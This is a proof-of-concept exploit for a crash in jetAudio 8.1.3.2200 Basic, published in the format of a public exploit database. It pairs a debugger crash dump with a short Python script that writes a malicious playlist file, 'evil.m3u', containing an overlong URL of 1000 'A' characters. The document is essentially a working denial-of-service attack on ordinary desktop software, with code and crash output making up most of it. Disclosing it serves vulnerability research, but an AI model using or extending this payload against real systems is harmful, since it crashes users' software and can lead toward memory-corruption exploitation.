# Exploit Title : jetAudio 8.1.3.2200 Basic (m3u) Crash POC # Product : jetAudio Basic # Date : 27.12.2014 # Exploit Author : Hadji Samir s-dz@hotmail.fr # Software Link : http://www.jetaudio.com/download/ # Vulnerable version : 8.1.3.2200 Basic # Vendor Homepage : http://www.jetaudio.com/ # Tested on : Windows 7 x86 fr #============================================================================================ # Open created POC file (evil.m3u) with jetAudio # Details # ((2bb0.2a60): Break instruction exception - code 80000003 (first chance) # eax=00000000 ebx=00000000 ecx=0012fb0c edx=76ed64f4 esi=fffffffe edi=00000000 # eip=76f2e60e esp=0012fb28 ebp=0012fb54 iopl=0 nv up ei pl zr na pe nc # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 # *** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll - # ntdll!LdrVerifyImageMatchesChecksum+0x633: # 76f2e60e cc int 3 # # 0:000> kb # ChildEBP RetAddr Args to Child # WARNING: Stack unwind information not available. Following frames may be wrong. # 0012fb54 76f0e2d1 7ffdf000 7ffd5000 76f6714c ntdll!LdrVerifyImageMatchesChecksum+0x633 # 0012fcb0 76ef8fc0 0012fd24 76e90000 7346e5a2 ntdll!RtlTimeToElapsedTimeFields+0x4e3d # 0012fd00 76eeb2c5 0012fd24 76e90000 00000000 ntdll!vsnwprintf+0x3eb # 0012fd10 00000000 0012fd24 76e90000 00000000 ntdll!LdrInitializeThunk+0x10 #============================================================================================ #!/usr/bin/python from struct import pack m3u = ("http://%s") buf = "\x41" * 1000 m3u %= buf fd = open("evil.m3u", "w") fd.write(m3u) fd.close()